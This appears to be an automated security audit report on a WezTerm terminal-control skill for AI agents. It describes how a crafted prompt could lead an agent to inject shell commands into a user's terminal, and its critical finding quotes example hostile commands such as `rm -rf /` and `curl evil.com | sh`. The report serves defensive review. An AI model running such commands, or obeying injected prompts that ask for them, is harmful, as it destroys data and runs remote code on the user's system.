Security Audit: wezterm
Source: github.com/Mrc220/agent_flywheel_clawdbot_skills_and_integrations

Trust Assessment
wezterm received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 3 findings: 1 critical, 1 high, 1 medium, and 0 low severity. Key findings include Direct Command Injection via `wezterm cli send-text`, Broad Terminal Control and System Access via WezTerm CLI, and Exposure of Sensitive Terminal Session Data.
The analysis covered 4 layers: llm_behavioral_safety, dependency_graph, static_code_analysis, manifest_analysis. The llm_behavioral_safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 11, 2026 (commit c7bd8e0f). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (3)

| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Direct Command Injection via `wezterm cli send-text`.** The skill exposes the `wezterm cli send-text` command, which allows an AI agent to send arbitrary text to an active terminal pane. This text is then executed by the shell running in that pane. An attacker could craft a prompt to trick the agent into sending malicious commands (e.g., `rm -rf /`, `curl evil.com \| sh`) to the user's terminal, leading to arbitrary code execution on the host system. **Recommendation:** Restrict the `send-text` command to a predefined set of safe commands or disallow arbitrary text input. Implement strict input validation and sanitization if any user-controlled input is passed to this command. Consider whether this capability is truly necessary for the agent's intended function. | Unknown | SKILL.md:79 |
| HIGH | **Broad Terminal Control and System Access via WezTerm CLI.** The skill grants the AI agent extensive control over the WezTerm terminal emulator, including the ability to list all running panes and their commands (`wezterm cli list`), create new terminal sessions with arbitrary commands (`wezterm cli spawn`, `wezterm start`), and inject commands into existing sessions (`wezterm cli send-text`). This level of access is highly privileged and effectively provides the agent with a shell-like interface to the user's system, enabling arbitrary code execution, data exfiltration, and system manipulation if the agent is compromised or misused. **Recommendation:** Re-evaluate the necessity of granting such broad terminal control to an AI agent. If specific WezTerm functionalities are required, consider creating more granular, sandboxed tools that expose only the minimum necessary capabilities, with strict input validation and output filtering. Avoid direct exposure of powerful CLI tools like `wezterm cli`. | Unknown | SKILL.md:1 |
| MEDIUM | **Exposure of Sensitive Terminal Session Data.** The `wezterm cli list` command, especially with `--format json`, can expose detailed information about all active terminal panes, including their current working directories, titles, and potentially the commands being executed within them. An agent, if prompted maliciously, could use this command to gather sensitive information about the user's ongoing work or system state, which could then be exfiltrated. **Recommendation:** If the agent needs to list panes, filter the output to include only non-sensitive information. Avoid exposing raw, unfiltered output from `wezterm cli list` to the agent or to external channels. Implement strict output sanitization. | Unknown | SKILL.md:14 |
Full report: https://skillshield.io/report/580a8214b095535b